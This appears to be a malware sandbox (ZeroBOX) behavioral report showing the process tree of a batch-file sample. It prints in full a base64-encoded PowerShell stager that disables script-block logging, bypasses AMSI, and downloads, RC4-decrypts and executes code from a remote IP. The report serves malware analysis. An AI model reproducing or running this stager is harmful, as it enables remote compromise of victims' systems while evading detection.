| ZeroBOX

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "MgXiZmVYlzEIurq" C:\Users\test22\AppData\Local\Temp\Trial.bat
2556
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Trial.bat
  2628
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText('C:\Users\test22\AppData\Local\Temp\Trial.bat')|iex"
    2716
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAcwBJAE8AbgBUAEEAQgBMAEUALgBQAFMAVgBlAHIAUwBpAG8ATgAuAE0AYQBqAE8AUgAgAC0ARwBlACAAMwApAHsAJABCADcARgA0AD0AWwBSAEUARgBdAC4AQQBzAFMARQBtAGIAbABZAC4ARwBlAFQAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdABpAGwAcwAnACkALgAiAEcAZQBUAEYAaQBlAGAAbABEACIAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMAeQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAEYAKAAkAEIANwBGADQAKQB7ACQAYgAzADkAOQA9ACQAQgA3AEYANAAuAEcARQB0AFYAYQBsAHUARQAoACQATgB1AGwATAApADsASQBGACgAJABiADMAOQA5AFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAYgAzADkAOQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABCADMAOQA5AFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAVgBhAGwAPQBbAEMAbwBsAEwARQBDAFQAaQBPAG4AUwAuAEcAZQBOAGUAUgBJAEMALgBEAEkAYwB0AEkAbwBOAGEAUgB5AFsAUwBUAFIASQBOAGcALABTAHkAUwB0AGUATQAuAE8AYgBqAEUAQwB0AF0AXQA6ADoAbgBlAHcAKAApADsAJAB2AGEATAAuAEEARABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAB2AEEATAAuAEEARABkACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAGIAMwA5ADkAWwAnAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaABlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQA9ACQAdgBhAGwAfQBFAEwAcwBFAHsAWwBTAGMAcgBpAFAAVABCAEwATwBDAGsAXQAuACIARwBFAFQARgBpAGUAYABsAGQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBsAFUARQAoACQAbgB1AEwAbAAsACgATgBFAHcALQBPAGIAagBlAEMAdAAgAEMATwBsAGwAZQBjAFQASQBvAG4AcwAuAEcAZQBOAGUAcgBpAEMALgBIAGEAcwBIAFMARQBUAFsAcwB0AFIASQBOAEcAXQApACkAfQAkAFIAZQBmAD0AWwBSAEUARgBdAC4AQQBzAFMARQBNAGIATABZAC4ARwBlAHQAVABZAFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAJwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBlAGYALgBHAEUAdABGAEkARQBsAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGACcAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQB0AFYAQQBsAFUAZQAoACQAbgB1AGwAbAAsACQAdABSAHUAZQApADsAfQA7AFsAUwBZAFMAVABFAE0ALgBOAGUAVAAuAFMARQByAHYASQBDAGUAUABvAEkATgB0AE0AYQBuAGEARwBFAFIAXQA6ADoARQBYAHAARQBDAHQAMQAwADAAQwBvAG4AdABpAG4AdQBFAD0AMAA7ACQARQBCAEQARAA9AE4ARQBXAC0ATwBiAGoAZQBjAFQAIABTAFkAcwB0AEUATQAuAE4AZQBUAC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQAZQBYAHQALgBFAE4AYwBPAEQAaQBOAGcAXQA6ADoAVQBOAGkAYwBPAGQARQAuAEcAZQBUAFMAVABSAGkAbgBnACgAWwBDAG8AbgB2AEUAcgB0AF0AOgA6AEYAUgBvAG0AQgBBAHMARQA2ADQAUwBUAHIAaQBuAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAEEAQQBNAFEAQQA2AEEARABjAEEATgB3AEEAMwBBAEQAYwBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGUAQgBEAEQALgBIAEUAQQBkAEUAUgBTAC4AQQBEAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABFAEIARABkAC4AUAByAE8AeAB5AD0AWwBTAFkAUwB0AGUATQAuAE4ARQBUAC4AVwBlAEIAUgBFAFEAVQBlAHMAVABdADoAOgBEAEUARgBhAFUAbAB0AFcARQBCAFAAcgBvAHgAWQA7ACQAZQBiAEQARAAuAFAAUgBvAHgAWQAuAEMAUgBFAEQAZQBOAFQASQBBAEwAcwAgAD0AIABbAFMAeQBTAHQARQBtAC4ATgBFAHQALgBDAHIAZQBkAGUAbgBUAEkAQQBsAEMAQQBjAGgARQBdADoAOgBEAEUARgBBAFUAbAB0AE4ARQBUAHcAbwBSAEsAQwBSAEUARABFAE4AdABJAEEATABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGUAYgBkAGQALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAWQBzAFQAZQBtAC4AVABlAHgAVAAuAEUATgBjAG8ARABJAE4ARwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAVABlAFMAKAAnAFMAQAA+AFoAfgBhAHAALABuAG8AZQAwAEoARABLAF0AbAAuACsAeQBGAD8AfQBMAE4APQBqADIAegB2AGIAVQAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwBVAE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAFgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAEUAYgBEAEQALgBIAEUAYQBEAEUAUgBzAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAGYAUABxAEYAbQBnAEMAdwB2AG8APQAvAFgAKwBGAHUAbQBYAHIANwBQAHgAMgBTAGoATwB1AHQAOABTAGoAZQBsAG8ANAA2ADQANAA9ACIAKQA7ACQAZABhAFQAQQA9ACQARQBCAGQARAAuAEQATwB3AE4ATABvAGEARABEAGEAdABhACgAJABTAGUAUgArACQAVAApADsAJABJAHYAPQAkAEQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAQQB0AEEAPQAkAEQAQQBUAEEAWwA0AC4ALgAkAEQAQQB0AGEALgBsAGUAbgBHAFQASABdADsALQBKAE8AaQBuAFsAQwBIAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
      2836

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents